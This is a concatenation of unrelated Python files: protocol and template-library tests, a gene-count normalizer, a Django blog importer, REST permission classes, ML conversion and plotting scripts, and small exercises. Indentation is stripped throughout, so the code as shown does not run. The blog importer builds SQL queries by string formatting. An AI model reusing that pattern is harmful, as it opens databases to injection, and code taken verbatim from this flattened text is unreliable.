response = """size.does.matter.af.MIL offers ZERO extensions:
"""
extensions, auth_types = parse_esmtp_extensions(response)
assert extensions == {}
assert auth_types == []
def test_auth_type_parsing():
response = """blah blah blah
AUTH FOO BAR
"""
extensions, auth_types = parse_esmtp_extensions(response)
assert "foo" in auth_types
assert "bar" in auth_types
assert "bogus" not in auth_types
def test_old_school_auth_type_parsing():
response = """blah blah blah
AUTH=PLAIN
"""
extensions, auth_types = parse_esmtp_extensions(response)
assert "plain" in auth_types
assert "cram-md5" not in auth_types
def test_mixed_auth_type_parsing():
response = """blah blah blah
AUTH=PLAIN
AUTH CRAM-MD5
"""
extensions, auth_types = parse_esmtp_extensions(response)
assert "plain" in auth_types
assert "cram-md5" in auth_types
|
python
|
import pytest
from liquid import *
def test_register_filter():
@filter_manager.register(mode='python')
def incr(base, inc=1):
return base + inc
liq = Liquid('{{ 2 | incr}}', dict(mode='python'))
assert liq.render() == '3'
liq = Liquid('{{ 2 | incr:2}}', dict(mode='python'))
assert liq.render() == '4'
liq = Liquid('{{ 2 | incr:inc=3}}', dict(mode='python'))
assert liq.render() == '5'
liq = Liquid('{{ 2 | incr}}', dict(mode='standard'))
with pytest.raises(LiquidRenderError):
liq.render()
def test_unregister_filter():
incr = filter_manager.unregister('incr', mode='python')
assert incr(1) == 2
with pytest.raises(LiquidFilterRegistryException):
filter_manager.unregister('incr_no_such', mode='python')
def test_complex_filters():
assert LiquidPython(
'{{path | @__import__("pathlib").Path | getattr: "stem"}}'
).render(
path='/a/b/cde.txt'
) == 'cde'
assert LiquidPython(
'{{path | @__import__("pathlib").Path | getattr: "stem" | getitem: 0}}'
).render(
path='/a/b/cde.txt'
) == 'c'
def test_render():
assert LiquidPython('{{ tpl | render }}').render(
tpl="{{x}}",
x=1
) == '1'
assert LiquidPython('{{ tpl | render: x=2 }}').render(
tpl="{{x}}",
x=1
) == '2'
assert LiquidPython('{{ tpl | render: x="foo" }}').render(
tpl="{{x | len}}",
x=1
) == '3'
with pytest.raises(LiquidRenderError):
assert LiquidPython('{{ tpl | render: x=2 }}').render(
tpl=[],
x=1
)
|
python
|
#!/usr/bin/env python
import os
import json
with open(os.path.join(os.environ['BOOST_CI_SRC_FOLDER'], 'meta', 'libraries.json')) as jsonFile:
lib_data = json.load(jsonFile)
print(lib_data['key'])
|
python
|
#!/usr/bin/env python2.7
import sys
import argparse
import gzip
import clsnaputil
#assumes you already have the AUCs
#pulled out using:
#wiggletools print non_unique_base_coverage.bw.auc AUC non_unique_base_coverage.bw
RECOUNT_TARGET = 40 * 1000000
SNAPTRON_FORMAT_CHR_COL = 1
SNAPTRON_FORMAT_COUNT_COL = 11
def load_metadata(args):
has_base_coverage_column = False
with open(args.metadata_file,"rb") as fin:
lines = fin.read()
lines = lines.split('\n')
fields = lines[1].split('\t')
if lines[len(lines)-1] == '':
lines.pop()
if args.auc_col == -1:
args.auc_col = len(fields) - 1
aucs = {}
zero_aucs = set()
sids = []
for x in lines:
fields = x.split('\t')
if fields[0] == 'rail_id':
has_base_coverage_column = fields[-1] == 'has_base_coverage'
if has_base_coverage_column and args.auc_col == len(fields) - 1:
args.auc_col -= 1
continue
if not has_base_coverage_column or fields[-1] == 'true':
#print fields[args.auc_col]
aucs[fields[args.sample_id_col]]=fields[args.auc_col]
#a few samples may have a AUC of 0, slightly offset them so the division goes through
if float(fields[args.auc_col]) == 0.0:
zero_aucs.add(fields[args.sample_id_col])
aucs[fields[args.sample_id_col]] = '0.00000001'
sids.append(fields[args.sample_id_col])
return (aucs, sids, zero_aucs)
def normalize_counts(args, aucs, sids, zero_aucs):
header = {}
if args.snaptron_format:
sys.stdout.write("gene_id")
[sys.stdout.write("\t"+x) for x in sids]
sys.stdout.write("\n")
zero_auc_positions = []
zlength1 = len(zero_aucs)
zlength2 = 0
#with gzip.open(args.counts_file,"rb") as fin:
if True:
#maps column position
for line in sys.stdin:
fields = None
fields__ = line.rstrip().split('\t')
if args.snaptron_format:
gene_id = fields__[SNAPTRON_FORMAT_CHR_COL] + ':' + '-'.join(fields__[SNAPTRON_FORMAT_CHR_COL+1:SNAPTRON_FORMAT_CHR_COL+3])
if args.id_type == 'gene_id':
gene_id = fields__[SNAPTRON_FORMAT_COUNT_COL-1].split(':')[0]
fields = {sid:0 for sid in sids}
for sample in fields__[SNAPTRON_FORMAT_COUNT_COL].split(',')[1:]:
(sid, count) = sample.split(':')
fields[sid] = int(count)
else:
gene_id = fields__[0]
if gene_id == 'gene_id' or gene_id == 'Group':
sys.stdout.write(line)
sids = fields__[args.count_start_col:]
continue
else:
fields = {sids[i]:int(float(count)) for (i,count) in enumerate(fields__[args.count_start_col:])}
if zlength2 == 0 and zlength1 > 0:
zero_auc_positions = [z for (z,sid) in enumerate(sids) if sid in zero_aucs]
zlength2 = len(zero_auc_positions)
fields = [int(clsnaputil.round_like_R((RECOUNT_TARGET * float(fields[sid]))/float(aucs[sid]),0)) for sid in sids]
#adjust normalized count for those samples with 0 AUC, should be a relatively small set
for zpos in zero_auc_positions:
fields[zpos] = 0
if args.skip_0_rows:
zeros = [1 for x in fields if x == 0]
if len(zeros) == len(fields):
continue
sys.stdout.write(gene_id+"\t"+"\t".join(map(str,fields))+"\n")
def main():
parser = argparse.ArgumentParser(description='Normalization of raw counts')
#parser.add_argument('--counts-file', metavar='/path/to/counts_file', type=str, default=None, help='path to a TSV file with matrix of counts', required=True)
parser.add_argument('--metadata-file', metavar='/path/to/sample_metadata_file', type=str, default=None, help='path to a TSV file with the Snaptron sample metadata', required=True)
parser.add_argument('--auc-col', metavar='-1', type=int, default=-1, help='which column in the sample metadata contains the AUC, default is the last')
parser.add_argument('--count-start-col', metavar='1', type=int, default=1, help='which column in the raw coverage file start the counts')
parser.add_argument('--sample-id-col', metavar='0', type=int, default=0, help='which column in the sample metadata contains the joining ID')
parser.add_argument('--snaptron-format', action='store_const', const=True, default=False, help='if gene raw counts file is coming from the genes Snaptron formatted DB')
parser.add_argument('--id-type', metavar='how to format the ID field', type=str, default='gene_id', help='what kind of row ID to use: "gene_id" (default), "coord"; only matters if --snaptron-format is also passed in')
parser.add_argument('--skip-0-rows', action='store_const', const=True, default=False, help='if all normalized counts in a row are zeros, drop the row from output')
args = parser.parse_args()
if args.snaptron_format:
args.count_start_col = 0
(aucs, sids, zero_aucs) = load_metadata(args)
normalize_counts(args, aucs, sids, zero_aucs)
if __name__ == '__main__':
main()
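# Illustrative invocation (hypothetical file names): raw counts stream in on stdin and
# normalized counts are written to stdout.
#   zcat gene_counts.tsv.gz | python2.7 normalize_counts.py \
#       --metadata-file samples.tsv --skip-0-rows > normalized_counts.tsv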
|
python
|
from optparse import make_option
import os
import shutil
from django.core.management.base import BaseCommand
from django.contrib.auth.models import User
import MySQLdb
from blog.models import Blog, Post, Asset
class Command(BaseCommand):
help = 'Import blog posts from Movable Type'
option_list = BaseCommand.option_list + (
make_option('-d',
dest='database',
help='The MT database name'),
make_option('-u',
dest='user',
help='The MT database user'),
make_option('-p',
dest='password',
help='The MT database password'),
make_option('-r',
dest='root',
help='The MT root directory (for copying image files)'),
make_option('-i',
dest='src_blog_id',
help='The MT blog ID to copy'),
make_option('-b',
dest='dst_blog_id',
                    help='The Django destination blog ID. Should exist.'))
def handle(self, *args, **options):
blog = Blog.objects.get(id=options['dst_blog_id'])
blog.ensure_assets_directory()
db = MySQLdb.Connect(db=options['database'], user=options['user'], passwd=options['password'])
entry_cursor = db.cursor()
entry_cursor.execute('''
select e.entry_id, e.entry_basename, e.entry_modified_on, e.entry_title, e.entry_text,
a.author_basename, a.author_email, a.author_nickname
from mt_entry as e, mt_author as a
where e.entry_blog_id = %s
and e.entry_author_id = a.author_id''' % options['src_blog_id'])
        entry_rows = list(entry_cursor)
        print entry_rows
        for row in entry_rows:
row = dict(zip(['id', 'basename', 'modified_on', 'title', 'body', 'username', 'email', 'first_name'], row))
print "create user %s" % row['username']
# Ensure the user exists.
try:
user = User.objects.get(username=row['username'])
except User.DoesNotExist:
user = User.objects.create_user(row['username'], row['email'])
user.first_name = row['first_name']
user.save()
# Create the blog post.
self.stdout.write('Create "%s"' % row['title'])
try:
post = Post.objects.get(blog=blog, user=user, slug=row['basename'])
except Post.DoesNotExist:
post = Post.objects.create(blog=blog,
user=user,
title=row['title'] or '<No Title>',
slug=row['basename'][:50],
pub_date=row['modified_on'],
body=row['body'])
# Create the files.
asset_cursor = db.cursor()
asset_cursor.execute('''select a.asset_file_path, a.asset_class
from mt_asset as a, mt_objectasset as oa
where oa.objectasset_object_id = %s
and oa.objectasset_blog_id = %s
and a.asset_id = oa.objectasset_asset_id''' % (row['id'], options['src_blog_id']))
for i, asset in enumerate(list(asset_cursor)):
position = i + 1
asset = dict(zip(['file_path', 'asset_class'], asset))
src_file = asset['file_path'].replace(r'%r', options['root'])
print src_file
dst_file = os.path.join(blog.assets_directory, os.path.basename(asset['file_path']))
if os.path.exists(src_file):
print src_file, "->", dst_file
shutil.copyfile(src_file, dst_file)
Asset.objects.create(post=post,
file_name=os.path.basename(dst_file),
type=asset['asset_class'],
description='',
position=position)
|
python
|
"""Programa 8_5.py
Descrição: Reescrever a função da listagem 8.5 de forma a utilizar os métodos de pesquisa em lista vistos no cap 7.
Autor:Cláudio Schefer
Data:
Versão: 001
"""
# Declaração de variáveis
L = []
valor = int (0)
# Entrada de dados
L = [10, 20, 25, 30]
# Processamento
def pesquise (lista, valor):
if valor in lista:
return lista.index(valor)
return None
# Data output
print(pesquise(L, 25))
print(pesquise(L, 27))
|
python
|
import asyncio
import logging
from timeit import default_timer as timer
from podping_hivewriter.async_context import AsyncContext
from podping_hivewriter.models.podping_settings import PodpingSettings
from podping_hivewriter.podping_settings import get_podping_settings
from pydantic import ValidationError
class PodpingSettingsManager(AsyncContext):
def __init__(self, ignore_updates=False):
super().__init__()
self.ignore_updates = ignore_updates
self.last_update_time = float("-inf")
self._settings = PodpingSettings()
self._settings_lock = asyncio.Lock()
self._startup_done = False
asyncio.ensure_future(self._startup())
async def _startup(self):
if not self.ignore_updates:
self._add_task(asyncio.create_task(self._update_podping_settings_loop()))
self._startup_done = True
async def _update_podping_settings_loop(self):
while True:
try:
await self.update_podping_settings()
await asyncio.sleep(self._settings.control_account_check_period)
except asyncio.CancelledError:
# re-raise cancellation so it is not swallowed by the generic handler below
raise
except Exception as e:
logging.error(e, exc_info=True)
async def update_podping_settings(self) -> None:
try:
podping_settings = await get_podping_settings(
self._settings.control_account
)
self.last_update_time = timer()
except ValidationError as e:
logging.warning(f"Problem with podping control settings: {e}")
else:
if self._settings != podping_settings:
logging.debug(
f"Configuration override from Podping Hive: {podping_settings}"
)
async with self._settings_lock:
self._settings = podping_settings
async def get_settings(self) -> PodpingSettings:
async with self._settings_lock:
return self._settings
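# A minimal usage sketch (illustration only, not part of the original module).
# The manager schedules its update loop when constructed, so it is assumed to be
# created from inside a running asyncio event loop, e.g.:
#
#   async def example():
#       manager = PodpingSettingsManager(ignore_updates=True)
#       settings = await manager.get_settings()
#       print(settings.control_account)
#
#   asyncio.run(example())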
|
python
|
from rest_framework import permissions
from API.models import *
class IsOwnerOrReadOnly(permissions.BasePermission):
"""
Custom permission to only allow owners of an object to edit it.
"""
def has_object_permission(self, request, view, obj):
# Read permissions are allowed to any request,
# so we'll always allow GET, HEAD or OPTIONS requests.
if request.method in permissions.SAFE_METHODS:
return True
# Write permissions are only allowed to the owner of the snippet.
return obj.owner == request.user
class OnlyPMorQALeadCanEdit(permissions.BasePermission):
"""
Custom permission: project team members can read; only the PM and QA Lead can edit.
"""
def has_object_permission(self, request, view, obj):
if isinstance(obj, Project):
project = obj
elif isinstance(obj, (ProjectTeam, Issue)):
project = obj.project
elif isinstance(obj, (Worklog, IssueAttachment, IssueLink, Comment)):
project = obj.issue.project
else:
return False
leads = ProjectTeam.objects.filter(project=project, team_role__in=['PM', 'QALEAD'])
team = ProjectTeam.objects.filter(project=project)
# Read permissions are allowed to any request,
# so we'll always allow GET, HEAD or OPTIONS requests.
if request.method in permissions.SAFE_METHODS and request.user in [member.user for member in team]:
return True
# Write permissions are only allowed to the qa lead or PM
if request.user in [member.user for member in leads]:
return True
# Superuser has full access to all endpoints
return request.user and request.user.is_staff
class IsProjectTeamOnly(permissions.BasePermission):
"""
Custom permission to only allow project team members to access an object.
"""
def has_object_permission(self, request, view, obj):
if isinstance(obj, Project):
project = obj
elif isinstance(obj, (ProjectTeam, Issue)):
project = obj.project
elif isinstance(obj, (Worklog, IssueAttachment, IssueLink, Comment)):
project = obj.issue.project
else:
return False
team = ProjectTeam.objects.filter(project=project)
# Write permissions are only allowed to the project team
if request.user in [member.user for member in team]:
return True
# Superuser has full access to all endpoints
return request.user and request.user.is_staff
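# A minimal wiring sketch (hypothetical view code, not part of this module).
# DRF permission classes like the ones above are attached to a view through
# `permission_classes`, e.g.:
#
#   from rest_framework import viewsets
#
#   class ProjectViewSet(viewsets.ModelViewSet):
#       queryset = Project.objects.all()
#       serializer_class = ProjectSerializer  # assumed to be defined elsewhere
#       permission_classes = [OnlyPMorQALeadCanEdit]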
|
python
|
WORD_EMBEDDING_FILE = './data/GoogleNews-vectors-negative300.txt'
WORD_EMBEDDING_BIN_FILE = './bin/unigram_embedding.pkl'
LOW_FREQ_TOKEN_FILE = './bin/unigram_low_freq_voc.pkl'
EMBEDDING_SIZE = 300
if __name__ == "__main__":
from preprocess.data import GigawordRaw, ParaphraseWikiAnswer
from gensim.models import Word2Vec
import os
import sys
import logging
logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)
if os.path.exists(WORD_EMBEDDING_FILE):
logging.info("Word embedding text file exists, exit")
sys.exit(0)
class Raw():
def __iter__(self):
sentences = GigawordRaw()
for sentence in sentences:
yield sentence
sentences = ParaphraseWikiAnswer(mode='raw_token')
for sentence_pair in sentences:
for i in sentences.sent_indx:
yield sentence_pair[i]
sentences = Raw()
# calculate embedding vector
logging.info("Generating embedding vectors")
model = Word2Vec(sentences, size=EMBEDDING_SIZE, window=5, min_count=1, workers=40)
model.save_word2vec_format(WORD_EMBEDDING_FILE, binary=False)
|
python
|
print('Vamos somar alguns números: ')
for c in range(1, 501):
if c % 3 == 0:
print(c)
|
python
|
#!/usr/bin/python
"""
Check current Husky battery status (via ROS)
usage:
./battery.py [<node IP> <master IP> | -m <metalog> [F]]
"""
import sys
import os
from huskyros import HuskyROS
# apyros should be common lib - now in katarina code
from apyros.sourcelogger import SourceLogger
from apyros.metalog import MetaLog, disableAsserts
def battery( metalog, assertWrite, ipPair ):
if metalog is None:
metalog = MetaLog()
robot = HuskyROS( filename=metalog.getLog("node"), replay=metalog.replay, ipPair=ipPair )
else:
robot = HuskyROS( filename=metalog.getLog("node"), replay=True, assertWrite=assertWrite, ipPair=ipPair ) # TODO move assert to metalog
scannerFn = SourceLogger( sourceGet=None, filename=metalog.getLog("scanner") ).get
robot.setSpeedPxPa( 0, 0 )
for i in xrange(10):
robot.update()
print "Battery: %.3f" % robot.power
if __name__ == "__main__":
if len(sys.argv) < 3:
print __doc__
sys.exit(1)
metalog = None
assertWrite = True
ipPair = None
if sys.argv[1] == '-m':
metalog = MetaLog( filename = sys.argv[2] )
if len(sys.argv) > 3 and sys.argv[3] == 'F':
assertWrite = False
disableAsserts()
else:
ipPair = ( sys.argv[1], 'http://'+sys.argv[2]+':11311' )
battery( metalog, assertWrite, ipPair )
#-------------------------------------------------------------------
# vim: expandtab sw=4 ts=4
|
python
|
import os
import tkinter.filedialog as tk
import natsort
pot = '/media/vid/DLS DATA/seq4Amod35/2112'
seznam = os.listdir(pot)
seznam = natsort.natsorted(seznam)
key = 'OHL'
temp = []
for i in seznam:
if key in i:
print(i)
if '.txt' in i:
continue
with open(pot + '/' + i, encoding='windows-1250') as file:
next(file)
for line in file:
temp.append(line)
print(len(temp))
# print(temp)
f = open(pot + '//' + key[:4] + '.txt', 'w')
for j in range(len(temp)):
f.write(temp[j])
# print(temp[j])
f.close()
|
python
|
#Will take a directory full of covariance models and feed them to Infernal's cmcalibrate one at a time.
#The resulting covariance models are put in sys.argv[3].
#This script may take several days to complete. Calibrating models of large alignments is slow.
#Necessary modules: biopython, infernal
#Usage: python Infernal_cmcalibrate.py <directory of cov models> <directory of stockholm alignments> <directory in which to put calibrated models>
import sys
import os
from Bio import AlignIO
import subprocess
import shutil
def runcmcalibrate(modelname):
subprocess.check_call(['cmcalibrate', modelname])
def calibratemodels(modelsdirectory, stockholmdirectory, calibratedmodelsdirectory):
modelcounter = 0
calibratedmodelcounter = 0
modelsdirectory = os.path.abspath(modelsdirectory)
stockholmdirectory = os.path.abspath(stockholmdirectory)
models = [os.path.join(modelsdirectory, model) for model in os.listdir(modelsdirectory)]
#If calibratedmodelsdirectory doesn't exist, make it
if os.path.exists ('./' + str(calibratedmodelsdirectory)) == False:
os.mkdir('./' + str(calibratedmodelsdirectory))
for model in models:
modelcounter +=1
if modelcounter % 10 == 0:
sys.stderr.write('Calibrating model {0} of {1}.\n'.format(modelcounter, len(models)))
#Get corresponding stockholm alignment
#if calibrated model doesn't already exist in calibratedmodelsdirectory
if os.path.exists(str(os.path.abspath(calibratedmodelsdirectory) + '/' +
str(os.path.basename(model.replace('.cm', '.c.cm'))))) == False:
stockholmalignmentname = os.path.basename(model.replace('.cm',''))
stockholmalignment = os.path.join(stockholmdirectory, stockholmalignmentname)
#Only calibrate models where the alignment is between 10 and 4000 columns long.
#Otherwise it takes forever. Still, expect an average of hours per alignment.
alignment_length = AlignIO.read(stockholmalignment, 'stockholm').get_alignment_length()
if alignment_length >= 10 and alignment_length <= 4000:
runcmcalibrate(model)
#Move calibrated model to its correct directory
shutil.copy2(str(model), str(os.path.abspath(calibratedmodelsdirectory)) + '/' +
str(os.path.basename(model.replace('.cm','.c.cm'))))
calibratedmodelcounter +=1
sys.stderr.write('Calibrated {0} of {1} models. The rest were outside the allowed size range or already calibrated.\n'.format(calibratedmodelcounter, len(models)))
if __name__ == '__main__':
calibratemodels(sys.argv[1], sys.argv[2], sys.argv[3])
|
python
|
outputText = """Yesterday I went to see {0}.
To be honest, I thought it was pretty good.
It's a good effort by {1}.
I hadn't seen a plot move quite as fluidly as it did in {0},
but {1} does have a good hand for it."""
print('What movie are we reviewing')
movie = input().title()
print('And who directs it?')
director = input().title()
print( outputText.format(movie,director) )
|
python
|
class ControllerSettings:
def __init__(self, powerslide, air_roll, air_roll_left, air_roll_right, boost, jump, ball_cam, brake, throttle):
self.powerslide = powerslide
self.air_roll = air_roll
self.air_roll_left = air_roll_left
self.air_roll_right = air_roll_right
self.boost = boost
self.jump = jump
self.ball_cam = ball_cam
self.brake = brake
self.throttle = throttle
|
python
|
import os
import nbformat
def get_cur_dir():
return os.path.abspath(os.path.dirname(__file__))
def get_par_dir():
return os.path.abspath(os.path.join(os.path.dirname(__file__), os.pardir))
def gen_items(path):
for item in os.listdir(path):
path_item = os.path.abspath(os.path.join(path, item))
assert os.path.exists(path_item), f"Missing : {path_item}"
yield path_item
def gen_folders(path=get_par_dir()):
for item in gen_items(path):
if os.path.isdir(item):
yield item
def gen_files(path, ext='ipynb'):
for item in gen_items(path):
if os.path.isfile(item):
if os.path.splitext(item)[-1].endswith(ext):
yield item
def gen_ipynb_files_above(path=get_par_dir(), ext='ipynb'):
for folder in gen_folders(path):
for file in gen_files(folder, ext):
yield file
def gen_cells(ipynb_file):
nb = nbformat.read(ipynb_file, nbformat.NO_CONVERT)
for cell in nb['cells']:
yield cell
def get_source_from_cell(cell):
assert isinstance(cell, nbformat.notebooknode.NotebookNode), repr(cell)
return cell['source']
def add_two_returns_if_missing(cell_source):
if cell_source.endswith('\n\n'):
pass
elif cell_source.endswith('\n'):
cell_source += '\n'
else:
cell_source += '\n\n'
return cell_source
def process_cell(cell):
cell['source'] = add_two_returns_if_missing(
get_source_from_cell(cell)
)
return cell
def process_file(input_ipynb_filename, output_ipynb_filename=None):
if output_ipynb_filename is None:
output_ipynb_filename = input_ipynb_filename
nb = nbformat.read(input_ipynb_filename, nbformat.NO_CONVERT)
for cell in nb['cells']:
process_cell(cell)
nbformat.write(nb, output_ipynb_filename)
def main():
for ipynb_file in gen_ipynb_files_above():
print(f'processing {ipynb_file}', end=' ')
process_file(ipynb_file)
print('done')
if "__main__" == __name__:
main()
|
python
|
#! /usr/bin/env python3
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
# File name: test.py
# First Edit: 2020-03-19
# Last Change: 19-Mar-2020.
"""
This script is for testing.
"""
amount_dict = {"high": 1.2, "normal": 1.0, "low": 0.8}
def main():
factorya = AbstractPizzaFactory(PizzaFactoryA())
pizza1 = factorya.make_pizza("high")
pizza1.check_pizza()
print("-----")
factoryb = AbstractPizzaFactory(PizzaFactoryB())
pizza2 = factoryb.make_pizza("normal")
pizza2.check_pizza()
# AbstractFactory
class AbstractPizzaFactory:
def __init__(self, pizza_factory, amount_str="normal"):
self.factory = pizza_factory
def make_pizza(self, amount_str):
amount = amount_dict[amount_str]
self.pizza_materials = []
self.pizza_materials.append(self.factory.add_dough(amount))
self.pizza_materials.append(self.factory.add_source(amount))
self.pizza_materials.append(self.factory.add_topping(amount))
return self  # return the factory so callers can call check_pizza() on the result
def check_pizza(self):
for pizza_material in self.pizza_materials:
pizza_material.check()
# createproduct
def add_dough(self, amount=1):
pass
# createproduct
def add_source(self, amount=1):
pass
# createproduct
def add_topping(self, amount=1):
pass
# ConcreteFactory
class PizzaFactoryA(AbstractPizzaFactory):
def __init__(self):
pass
# createproduct
def add_dough(self, amount=1):
return WheatDough(amount)
# createproduct
def add_source(self, amount=1):
return TomatoSource(amount)
# createproduct
def add_topping(self, amount=1):
return CoanTopping(amount)
# ConcreteFactory
class PizzaFactoryB(AbstractPizzaFactory):
def __init__(self):
pass
# createproduct
def add_dough(self, amount=1):
return RiceFlourDough(amount)
# createproduct
def add_source(self, amount=1):
return BasilSource(amount)
# createproduct
def add_topping(self, amount=1):
return CheeseTopping(amount)
# __init__ is shared in this case, so the child classes below do not define their own __init__.
# ConcreteProduct
class Dough:
def __init__(self, amount):
self.amount = amount
def check(self):
pass
# ConcreteProduct
class WheatDough(Dough):
def check(self):
print("Wheat(amount: {})".format(self.amount))
# ConcreteProduct
class RiceFlourDough(Dough):
def check(self):
print("FlourDough(amount: {})".format(self.amount))
# ConcreteProduct
class Source:
def __init__(self, amount):
self.amount = amount
def check(self):
pass
# ConcreteProduct
class TomatoSource(Source):
def check(self):
print("Tomato(amount: {})".format(self.amount))
# ConcreteProduct
class BasilSource(Source):
def check(self):
print("Basil(amount: {})".format(self.amount))
# ConcreteProduct
class Topping:
def __init__(self, amount):
self.amount = amount
def check(self):
pass
# ConcreteProduct
class CoanTopping(Topping):
def check(self):
print("Coan(amount: {})".format(self.amount))
# ConcreteProduct
class CheeseTopping(Topping):
def check(self):
print("Cheese(amount: {})".format(self.amount))
if __name__ == "__main__":
main()
|
python
|
'''
Longest Common Subsequence
Description
Given two strings, return the longest common subsequence(s) of the two strings (not the longest common substring); there may be more than one.
Input
The input is two lines, one string per line.
Output
If there are multiple results, output them on separate lines; their order does not matter.
Sample input
1A2BD3G4H56JK
23EFG4I5J6K7
Sample output
23G456K
23G45JK
'''
'''
d is the direction matrix
1: upper-left (diagonal)
2: up
3: left
4: left or up
'''
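# A small worked example (illustration only): for a = 'AB' and b = 'AC',
# C[1][1] = 1 with d[1][1] = 1 (match on 'A'), C[1][2] stays 1 via d = 3 (left),
# C[2][1] stays 1 via d = 2 (up), and C[2][2] keeps 1 via d = 4 (left or up),
# so the only longest common subsequence printed is 'A'.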
def LCS (a, b):
C = [[0 for i in range(len(b) + 1)] for i in range(len(a) + 1)] # matrix C stores the length of the longest common subsequence
d = [[0 for i in range(len(b) + 1)] for i in range(len(a) + 1)] # matrix d stores the direction used to reconstruct the LCS
for i in range(1, len(a) + 1):
for j in range(1, len(b) + 1):
if a[i - 1] == b[j - 1]:
C[i][j] = C[i - 1][j - 1] + 1
d[i][j] = 1 # upper-left (diagonal)
elif C[i][j - 1] < C[i - 1][j]:
C[i][j] = C[i - 1][j]
d[i][j] = 2 # up
elif C[i][j - 1] > C[i - 1][j]:
C[i][j] = C[i][j - 1]
d[i][j] = 3 # left
else: # C[i][j - 1] == C[i - 1][j]
C[i][j] = C[i - 1][j]
d[i][j] = 4 # left or up
maxLen = C[len(a)][len(b)]
lcs = ""
printLCS(d, a, lcs, 1, maxLen, len(a), len(b))
def printLCS (d, a, s, curLen, maxLen, i, j):
if i == 0 or j == 0:
return None
dir = d[i][j]
if dir == 1:
if curLen == maxLen:
s += a[i - 1]
s = s[::-1]
strDict[s] = i - 1
elif curLen < maxLen:
s += a[i - 1]
printLCS(d, a, s, curLen + 1, maxLen, i - 1, j - 1)
elif dir == 2:
printLCS(d, a, s, curLen, maxLen, i - 1, j)
elif dir == 3:
printLCS(d, a, s, curLen, maxLen, i, j - 1)
elif dir == 4:
printLCS(d, a, s, curLen, maxLen, i - 1, j)
printLCS(d, a, s, curLen, maxLen, i, j - 1)
if __name__ == '__main__':
a = input().strip()
b = input().strip()
strDict = dict()
LCS(a, b)
for key in strDict.keys():
print(key)
|
python
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Script to convert YOLO keras model to an integer quantized tflite model
using latest Post-Training Integer Quantization Toolkit released in
tensorflow 2.0.0 build
"""
import os, sys, argparse
import numpy as np
import tensorflow as tf
from tensorflow.keras.models import load_model
sys.path.append(os.path.join(os.path.dirname(os.path.realpath(__file__)), '..'))
from yolo3.data import get_ground_truth_data
from common.utils import get_custom_objects
#tf.enable_eager_execution()
def post_train_quant_convert(keras_model_file, annotation_file, sample_num, model_input_shape, output_file):
#get input_shapes for converter
input_shapes=list((1,)+model_input_shape+(3,))
with open(annotation_file) as f:
annotation_lines = f.readlines()
custom_object_dict = get_custom_objects()
model = load_model(keras_model_file, custom_objects=custom_object_dict)
converter = tf.lite.TFLiteConverter.from_keras_model(model)
def data_generator():
n = len(annotation_lines)
i = 0
for num in range(sample_num):
image, _ = get_ground_truth_data(annotation_lines[i], model_input_shape, augment=True)
i = (i+1) % n
image = np.array([image], dtype=np.float32)
yield [image]
converter.optimizations = [tf.lite.Optimize.DEFAULT]
#converter.optimizations = [tf.lite.Optimize.OPTIMIZE_FOR_SIZE]
#converter.optimizations = [tf.lite.Optimize.OPTIMIZE_FOR_LATENCY]
converter.representative_dataset = tf.lite.RepresentativeDataset(data_generator)
#converter.target_spec.supported_ops = [tf.lite.OpsSet.TFLITE_BUILTINS_INT8]
tflite_model = converter.convert()
with open(output_file, "wb") as f:
f.write(tflite_model)
def main():
parser = argparse.ArgumentParser(argument_default=argparse.SUPPRESS, description='TF 2.x post training integer quantization converter')
parser.add_argument('--keras_model_file', required=True, type=str, help='path to keras model file')
parser.add_argument('--annotation_file', required=True, type=str, help='annotation txt file to feed the converter')
parser.add_argument('--sample_num', type=int, help='annotation sample number to feed the converter,default 30', default=30)
parser.add_argument('--model_input_shape', type=str, help='model image input shape as <num>x<num>, default 416x416', default='416x416')
parser.add_argument('--output_file', required=True, type=str, help='output tflite model file')
args = parser.parse_args()
height, width = args.model_input_shape.split('x')
model_input_shape = (int(height), int(width))
post_train_quant_convert(args.keras_model_file, args.annotation_file, args.sample_num, model_input_shape, args.output_file)
if __name__ == '__main__':
main()
|
python
|
from taskcontrol.lib import EPubSubBase
def run(data):
print("Running Pubsub ", data)
def publisher(data):
print("Running publisher ", data)
def subscriber(data):
print("Running subscriber ", data)
config = {"name": "new", "handler": run, "queue": None, "maxsize": 10,
"queue_type": "queue", "processing_flag": False, "batch_interval": 5, "events": {}}
name = config.get("name")
pb = EPubSubBase()
p = pb.pubsub_create(config)
if p:
print("Event registered ", pb.register_event(name, {"name": "testevent", "event": run}))
print("Event listened ", pb.listen(name, "testevent"))
print("Publisher registered ", pb.register_publisher(name, {"name": "pubone", "event_name": "testevent", "publisher": publisher}))
print("Subscribers registered ", pb.register_subscriber(name, {"name": "subone", "event_name": "testevent", "subscriber": subscriber}))
print("Subscribers registered ", pb.register_subscriber(name, {"name": "subtwo", "event_name": "testevent", "subscriber": subscriber}))
print("Event sending ", pb.send({"event_name": "testevent", "queue_name": "new", "message": "Testing event testevent", "publisher": "pubone"}))
print("Publisher unregistered ", pb.unregister_publisher(name, {"name": "pubone", "event_name": "testevent"}))
print("Subscriber unregistered ", pb.unregister_subscriber(name, {"name": "subone", "event_name": "testevent"}))
print("Subscriber unregistered ", pb.unregister_subscriber(name, {"name": "subtwo", "event_name": "testevent"}))
print("Pubsub Object PRINT FROM SCRIPT: ", pb.fetch(name))
print("Event unlistened ", pb.stop(name, "testevent"))
print("Pubsub Object Deleted ", pb.pubsub_delete(name))
print("Pubsub Object (Should return Error for handling) ", pb.fetch(name))
|
python
|
import numpy as np
import os
import sys
from astropy.io import fits
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
plt.style.use('araa')
from matplotlib import rc
rc('text.latex', preamble=r'\usepackage{amsmath}')
rc("font", **{"family": "serif", "serif": ["Palatino"]})
rc("text", usetex = True)
from matplotlib.colorbar import Colorbar
from matplotlib import mlab, cm
from astropy.visualization import (AsinhStretch, LinearStretch, ImageNormalize)
from matplotlib.patches import Ellipse
from matplotlib.font_manager import FontProperties
# set up plots
fig = plt.figure(figsize=(6.33, 2.1))
gs = gridspec.GridSpec(1, 3)
xlims = [4.2017, -4.2017]
ylims = [-4.2017, 4.2017]
ax0 = fig.add_subplot(gs[0,0])
ax0.set_xlim(xlims)
ax0.set_ylim(ylims)
ax0.set_xticklabels([])
ax0.set_yticklabels([])
ax1 = fig.add_subplot(gs[0,1])
ax1.set_xlim(xlims)
ax1.set_ylim(ylims)
ax1.set_xticklabels([])
ax1.set_yticklabels([])
